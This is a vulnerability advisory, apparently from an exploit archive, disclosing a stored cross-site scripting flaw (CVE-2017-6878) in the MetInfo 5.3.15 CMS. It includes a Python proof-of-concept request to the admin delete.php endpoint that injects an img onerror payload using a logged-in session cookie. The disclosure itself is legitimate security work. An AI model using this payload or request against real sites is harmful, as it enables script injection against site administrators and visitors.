MetInfo 5.3.15 Cross Site Scripting

MetInfo version 5.3.15 suffers from a stored cross site scripting vulnerability.


MD5 | 64ce6e67fc42b58e19da5b6160714bd9

PSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPS
PSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPS
[CVE-2017-6878]:MetInfo5.3.15 Stored Cross Site Scripting
Application: MetInfo
Versions Affected: 5.3.15
Vendor URL: http://www.metinfo.cn/
Software Link:http://www.metinfo.cn/upload/file/MetInfo5.3.zip
Bugs: Stored XSS
Author:Arice.chen(DBAPPSecurity Ltd)
Description:
MetInfo was established in March 2009, is a enterprise CMS, more than 40 m enterprises in the use of MeInfo build their own enterprise website.


Vulnerability detailsPSo
To modify, add a message in problem position insert JavaScript test code <img src=x onerror=alert(1)>
Then the background access to relevant pages, or other users access to the front desk page will make the attack code is executed.
---------------------------------------------
[email protected]
DBAppSecurity Ltd
www.dbappsecurity.com.cn


POC:
import requests
url = "http://192.168.0.28/MetInfo5.3/admin/column/delete.php?anyid=25&lang=cn&ajaxmetinfo=1&no_order_2=1&name_2=1<img src=x onerror=alert(2)>&nav_2=1&index_num_2=0&action=editor&lang=cn&anyid=25&allid=2,"
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
}
cookies = dict(PHPSESSID="9o2pth5a43hpj23nflnc7lfi24",
recordurl="",
met_auth="dfc7PoNLWryZ6Bu2hOEqxsEzRwMf3Nc%2BYqOWCxrSuQ2SivQF%2Fwfo0OP4JEP%2F7QakKJaXa46h5BB3nqrtt58caQaJcQ",
met_key="pnZh0Fw",
langset="cn",
upgraderemind="1",
tablepage_json="0%7Cuser%2Cadmin_user%2Cdojson_user_list"
)
s = requests.get(url,cookies=cookies,headers=headers,timeout=10,verify=False)
if s.status_code==200:
print 'Success'


Use this POC needs to obtain the cookie after login, because insert JavaScript place in the background.
The problem find is delete.php?name_2=
payload is :<img src=x onerror=alert(2)>


If after the success of the insert JavaScript, to several places in the background and other users access to the front desk page to attack code execution



Related Posts